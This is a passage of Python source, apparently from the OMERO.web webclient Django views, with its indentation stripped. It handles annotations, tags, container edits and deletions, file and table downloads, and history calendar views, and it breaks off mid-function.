# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = (
"Can't add annotations because you don't" " have permissions"
)
obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (
len(request.GET.getlist("tag")) > 0
or len(request.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if "image" in objs and len(objs["image"]) > 0:
iids = [i.getId() for i in objs["image"]]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo["count"] += archivedInfo["count"]
filesetInfo["size"] += archivedInfo["size"]
context = {
"iids": iids,
"obj_string": obj_string,
"link_string": link_string,
"obj_labels": obj_labels,
"batch_ann": True,
"figScripts": figScripts,
"canExportAsJpg": canExportAsJpg,
"filesetInfo": filesetInfo,
"annotationBlocked": annotationBlocked,
"differentGroups": False,
}
if len(groupIds) > 1:
context["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
context["differentGroups"] = True # E.g. don't run scripts etc
context["canDownload"] = manager.canDownload(objs)
context["template"] = "webclient/annotations/batch_annotate.html"
context["webclient_path"] = reverse("webindex")
context["annotationCounts"] = manager.getBatchAnnotationCounts(
getObjects(request, conn)
)
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
On 'POST', This handles attaching an existing file-annotation(s) and/or
upload of a new file to one or more objects
Otherwise it generates the form for choosing file-annotations & local
files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
if obj_count == 0:
raise Http404("Need to specify objects via e.g. ?image=1")
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if o_type == "tagset":
# TODO: this should be handled by the BaseContainer
o_type = "tag"
kw = {}
if o_type is not None and int(o_id) > 0:
kw[str(o_type)] = int(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs]
)
break
initial["files"] = files
if request.method == "POST":
# handle form submission
form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data["files"]
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks("file", files, oids)
# upload new file
fileupload = (
"annotation_file" in request.FILES
and request.FILES["annotation_file"]
or None
)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(fileupload, oids)
added_files.append(newFileId)
return JsonResponse({"fileIds": added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {"form_file": form_file}
template = "webclient/annotations/files_form.html"
context["template"] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
if request.method != "POST":
raise Http404("Only POST supported")
rating = getIntOrDefault(request, "rating", 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
# return a summary of ratings
return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
"""Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != "POST":
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
"shares": oids["share"],
}
# Use the first object we find to set context (assume all objects are in
# same group!) this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data["comment"]
if content is not None and content != "":
if oids["share"] is not None and len(oids["share"]) > 0:
sid = oids["share"][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
"tann": textAnn,
"added_by": conn.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(content, oids)
context = {"annId": annId, "added_by": conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != "POST":
raise Http404(
"Need to POST map annotation data as list of" " ['key', 'value'] pairs"
)
oids = getObjects(request, conn)
# Use the first object we find to set context (assume all objects are in
# same group!)
# this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
data = request.POST.get("mapAnnotation")
data = json.loads(data)
annIds = request.POST.getlist("annId")
ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
# Create a new annotation
if len(annIds) == 0 and len(data) > 0:
duplicate = request.POST.get("duplicate", "false")
duplicate.lower() == "true"
# For 'client' map annotations, we enforce 1 annotation per object
if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
duplicate = True
if duplicate:
# Create a new Map Annotation for each object:
for k, objs in oids.items():
for obj in objs:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
obj.linkAnnotation(ann)
else:
# Create single Map Annotation and link to all objects
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
# Or update existing annotations
else:
for annId in annIds:
ann = conn.getObject("MapAnnotation", annId)
if ann is None:
continue
if len(data) > 0:
ann.setValue(data)
ann.save()
else:
# Delete if no data
handle = conn.deleteObjects("/Annotation", [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
if len(data) == 0:
annIds = None
return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, "group", -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get("offset"))
limit = int(request.GET.get("limit", 1000))
except Exception:
offset = limit = None
jsonmode = request.GET.get("jsonmode")
if jsonmode == "tagcount":
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == "tags":
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == "desc":
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == "owners":
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected["projects"],
dataset_ids=selected["datasets"],
image_ids=selected["images"],
screen_ids=selected["screens"],
plate_ids=selected["plates"],
run_ids=selected["acquisitions"],
well_ids=selected["wells"],
ann_type="tag",
# If we reach this limit we'll get some tags not removed
limit=ANNOTATIONS_LIMIT,
)
userMap = {}
for exp in users:
userMap[exp["id"]] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t["id"]
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t["link"]["owner"]["id"] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag["link"]["owner"]["id"]
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
canDelete = True
created = tag["link"]["date"]
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag["id"], self_id, ownerName, canDelete, created, linkOwned)
)
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
if request.method == "POST":
# handle form submission
form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix="newtags", data=request.POST.copy()
)
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = list(form_tags.cleaned_data["tags"])
tags = [tag for tag in post_tags if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks("tag", tags, oids)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(
manager.createTagAnnotations(
form.cleaned_data["tag"],
form.cleaned_data["description"],
oids,
tag_group_id=form.cleaned_data["tagset"],
)
)
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove(
[
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs
],
tag_owner_id=self_id,
)
return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
context = {
"form_tags": form_tags,
"newtags_formset": newtags_formset,
"selected_tags": selected_tags,
}
template = "webclient/annotations/tags_form.html"
context["template"] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i + 1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get("confirm_apply", None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get("parentId", None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv["imageCount"] = counts["imageCount"]
rv["updateCount"] = counts["updateCount"]
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exist (id:%s)." % (fileId)
)
rsp = ConnCleaningHttpResponse(orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp["Content-Type"] = mimetype
rsp["Content-Length"] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
"""
Download OMERO.table as CSV (streaming response) or return as HTML or json
Request parameters:
header: 'false' excludes the column names row if mtype is 'csv'
offset: table rows offset for pagination
limit: table rows limit for pagination
query: OMERO.table query for filtering rows
@param file_id: OriginalFile ID
@param mtype: None for html table or 'csv' or 'json'
@param conn: BlitzGateway connection
"""
query = request.GET.get("query", "*")
offset = get_long_or_default(request, "offset", 0)
limit = get_long_or_default(request, "limit", settings.PAGE)
iviewer_url = None
try:
iviewer_url = reverse("omero_iviewer_index")
except NoReverseMatch:
pass
# Check if file exists since _table_query() doesn't check
file_id = long(file_id)
orig_file = conn.getObject("OriginalFile", file_id)
if orig_file is None:
raise Http404("OriginalFile %s not found" % file_id)
lazy = mtype == "csv"
context = webgateway_views._table_query(
request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
)
if context.get("error") or not context.get("data"):
return JsonResponse(context)
# OR, return as csv or html
if mtype == "csv":
table_data = context.get("data")
hide_header = request.GET.get("header") == "false"
def csv_gen():
if not hide_header:
csv_cols = ",".join(table_data.get("columns"))
yield csv_cols
for rows in table_data.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
)
downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
downloadName = downloadName + ".csv"
rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
rsp.conn = conn
rsp.table = context.get("table")
rsp["Content-Type"] = "application/force-download"
# rsp['Content-Length'] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
context["data"]["name"] = orig_file.name
context["data"]["path"] = orig_file.path
context["data"]["id"] = file_id
context["meta"]["query"] = query
# check if offset matches an integer page number:
if offset == 0 or offset / limit == offset // limit:
context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
# pagination links
url = reverse("omero_table", args=[file_id])
context["meta"]["url"] = url
url += "?limit=%s" % limit
if query != "*":
url += "&query=%s" % query
if (offset + limit) < context["meta"]["totalCount"]:
context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
if offset > 0:
context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
# by default, return context as JSON data
if mtype is None:
context["template"] = "webclient/annotations/omero_table.html"
context["iviewer_url"] = iviewer_url
col_types = context["data"]["column_types"]
if "ImageColumn" in col_types:
context["image_column_index"] = col_types.index("ImageColumn")
if "WellColumn" in col_types:
context["well_column_index"] = col_types.index("WellColumn")
if "RoiColumn" in col_types:
context["roi_column_index"] = col_types.index("RoiColumn")
# we don't use ShapeColumn type - just check name and LongColumn type...
# TODO: when ShapeColumn is supported, add handling to this code
cnames = [n.lower() for n in context["data"]["columns"]]
if "shape" in cnames and col_types[cnames.index("shape")] == "LongColumn":
context["shape_column_index"] = cnames.index("shape")
# provide example queries - pick first DoubleColumn...
for idx, c_type in enumerate(col_types):
if c_type in ("DoubleColumn", "LongColumn"):
col_name = context["data"]["columns"][idx]
# find first few non-empty cells...
vals = []
for row in context["data"]["rows"]:
if row[idx]:
vals.append(row[idx])
if len(vals) > 3:
break
if " " in col_name or len(vals) < 2:
# Don't support queries on columns with spaces
continue
context["example_column"] = col_name
context["example_min_value"] = min(vals)
context["example_max_value"] = max(vals)
break
return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
"""Returns the file annotation as an http response for download"""
ann = conn.getObject("FileAnnotation", annId)
if ann is None:
return handlerInternalError(
request, "FileAnnotation does not exist (id:%s)." % (annId)
)
rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % (
ann.getFileName().replace(" ", "_")
)
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
"""Downloads the 'Original Metadata' as a text file"""
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = len(rspText)
rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get("format", None)
if format is not None:
download_url = reverse("download_as")
zipName = "Export_as_%s" % format
else:
download_url = reverse("archived_files")
zipName = "OriginalFileDownload"
targetIds = request.GET.get("ids") # E.g. image-1|image-2
defaultName = request.GET.get("name", zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
filesTotalSize = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
filesTotalSize += f.getSize()
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(fList) for fList in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([_id.replace("-", "=") for _id in ids])
download_url = download_url + "?" + query
if format is not None:
download_url = download_url + "&format=%s" % format
context = {
"template": "webclient/annotations/download_placeholder.html",
"url": download_url,
"defaultName": defaultName,
"fileLists": fileLists,
"fileCount": fileCount,
"filesTotalSize": filesTotalSize,
}
if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get("user_id")
if year is not None and month is not None:
controller = BaseCalendar(conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id
)
controller.create_calendar()
context = {"controller": controller}
context["template"] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
"""The data for a particular date that is loaded into the center panel"""
if year is None or month is None or day is None:
raise Http404("Year, month, and day are required")
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get("page", 1))
filter_user_id = request.session.get("user_id")
controller = BaseCalendar(
